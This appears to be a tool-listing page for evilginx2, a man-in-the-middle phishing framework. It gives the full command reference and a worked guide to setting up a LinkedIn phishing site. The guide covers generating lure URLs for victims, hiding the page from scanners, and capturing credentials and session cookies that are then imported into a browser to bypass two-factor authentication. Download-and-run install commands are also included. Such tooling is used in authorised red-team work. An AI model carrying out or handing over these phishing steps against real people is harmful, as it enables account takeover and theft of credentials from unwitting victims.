evilginx2
evilginx2 Description
evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection.
This tool is a successor to Evilginx, released in 2017, which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.
Homepage: https://github.com/kgretzky/evilginx2
Author: Kuba Gretzky
License: GPLv3
evilginx2 Help
Usage:
./evilginx
Options:
-debug
Enable debug output
-developer
Enable developer mode (generates self-signed certificates for all hostnames)
-p string
Phishlets directory path
evilginx2 Commands
general
config : manage general configuration
phishlets : manage phishlets configuration
sessions : manage sessions and captured tokens with credentials
lures : manage lures for generation of phishing urls
clear : clears the screen
config
Shows values of all configuration variables and allows to change them.
config : show all configuration variables
config domain <domain> : set base domain for all phishlets (e.g. evilsite.com)
config ip <ip_address> : set ip address of the current server
config redirect_key <name> : change name of the redirect parameter in phishing url (phishing urls will need to be regenerated)
config verification_key <name> : change name of the verification parameter in phishing url (phishing urls will need to be regenerated)
config verification_token <token> : change the value of the verification token (phishing urls will need to be regenerated)
config redirect_url <url> : change the url where all unauthorized requests will be redirected to (phishing urls will need to be regenerated)
phishlets
Shows status of all available phishlets and allows to change their parameters and enabled status.
phishlets : show status of all available phishlets
phishlets hostname <phishlet> <hostname> : set hostname for given phishlet (e.g. this.is.not.a.phishing.site.evilsite.com)
phishlets enable <phishlet> : enables phishlet and requests ssl/tls certificate if needed
phishlets disable <phishlet> : disables phishlet
phishlets hide <phishlet> : hides the phishing page, logging and redirecting all requests to it (good for avoiding scanners when sending out phishing links)
phishlets unhide <phishlet> : makes the phishing page available and reachable from the outside
phishlets get-url <phishlet> <redirect_url> : generates phishing url with redirection on successful authentication
phishlets get-hosts <phishlet> : generates entries for hosts file in order to use localhost for testing
sessions
Shows all captured credentials and authentication tokens. Allows to view full history of visits and delete logged sessions.
sessions : show history of all logged visits and captured credentials
sessions <id> : show session details, including captured authentication tokens, if available
sessions delete <id> : delete logged session with <id> (ranges with separators are allowed e.g. 1-7,10-12,15-25)
sessions delete all : delete all logged sessions
lures
Shows all create lures and allows to edit or delete them.
lures : show all create lures
lures <id> : show details of a lure with a given <id>
lures create <phishlet> : creates new lure for given <phishlet>
lures delete <id> : deletes lure with given <id>
lures delete all : deletes all created lures
lures edit path <id> <path> : sets custom url <path> for a lure with a given <id>
lures edit redirect_url <id> <redirect_url> : sets redirect url that user will be navigated to on successful authorization, for a lure with a given <id>
lures edit phishlet <id> <phishlet> : change the phishlet, the lure with a given <id> applies to
lures edit info <id> <info> : set personal information to describe a lure with a given <id> (display only)
lures edit og_title <id> <title> : sets opengraph title that will be shown in link preview, for a lure with a given <id>
lures edit og_desc <id> <title> : sets opengraph description that will be shown in link preview, for a lure with a given <id>
lures edit og_image <id> <title> : sets opengraph image url that will be shown in link preview, for a lure with a given <id>
lures edit og_url <id> <title> : sets opengraph url that will be shown in link preview, for a lure with a given <id>
lures edit params <id> <key=value> : adds, edits or removes custom parameters (used in javascript injections), for a lure with a given <id>
evilginx2 Usage Example
To get up and running, you need to first do some setting up.
At this point I assume, you've already registered a domain (let's call it yourdomain.com) and you set up the nameservers (both ns1 and ns2) in your domain provider's admin panel to point to your server's IP (e.g. 10.0.0.1):
ns1.yourdomain.com = 10.0.0.1 ns2.yourdomain.com = 10.0.0.1
In the evilginx2 set up your server's domain and IP using following commands:
config domain yourdomain.com config ip 10.0.0.1
Now you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):
phishlets hostname linkedin my.phishing.hostname.yourdomain.com
And now you can enable the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:
phishlets enable linkedin
Your phishing site is now live. Think of the URL, you want the victim to be redirected to on successful login and get the phishing URL like this (victim will be redirected to https://www.google.com):
phishlets get-url linkedin https://www.google.com
Running phishlets will only respond to tokenized links, so any scanners who scan your main domain will be redirected to URL specified as redirect_url under config. If you want to hide your phishlet and make it not respond even to valid tokenized phishing URLs, use phishlet hide/unhide <phishlet> command.
You can monitor captured credentials and session cookies with:
sessions
To get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:
sessions <id>
The captured session cookie can be copied and imported into Chrome browser, using EditThisCookie extension.
Important! If you want evilginx2 to continue running after you log out from your server, you should run it inside a screen session.
How to install evilginx2
Installation on Kali Linux
wget -O evilginx_linux.zip https://github.com`curl -s https://github.com/kgretzky/evilginx2/releases | grep -E -o '/kgretzky/evilginx2/releases/download/[0-9.]+/evilginx_linux[0-9a-z._]+zip' | head -n 1` unzip evilginx_linux.zip -d evilginx rm evilginx_linux.zip cd evilginx/ chmod 700 ./evilginx sudo ./evilginx
Installation on Linux (Debian, Mint, Ubuntu)
wget -O evilginx_linux.zip https://github.com`curl -s https://github.com/kgretzky/evilginx2/releases | grep -E -o '/kgretzky/evilginx2/releases/download/[0-9.]+/evilginx_linux[0-9a-z._]+zip' | head -n 1` unzip evilginx_linux.zip -d evilginx rm evilginx_linux.zip cd evilginx/ chmod 700 ./evilginx sudo ./evilginx
evilginx2 Screenshots
evilginx2 Tutorials
- How to bypass two-factor authentication with evilginx2
- VDS for testing (very cheap)
- VDS for testing (international)
Related tools
- Router Scan (59.4%)
- sqlmap (57.2%)
- Maltego (57.2%)
- Pupy (57.2%)
- Spraykatz (52.2%)
- hashcat-utils (RANDOM - 2.2%)
Comments are Closed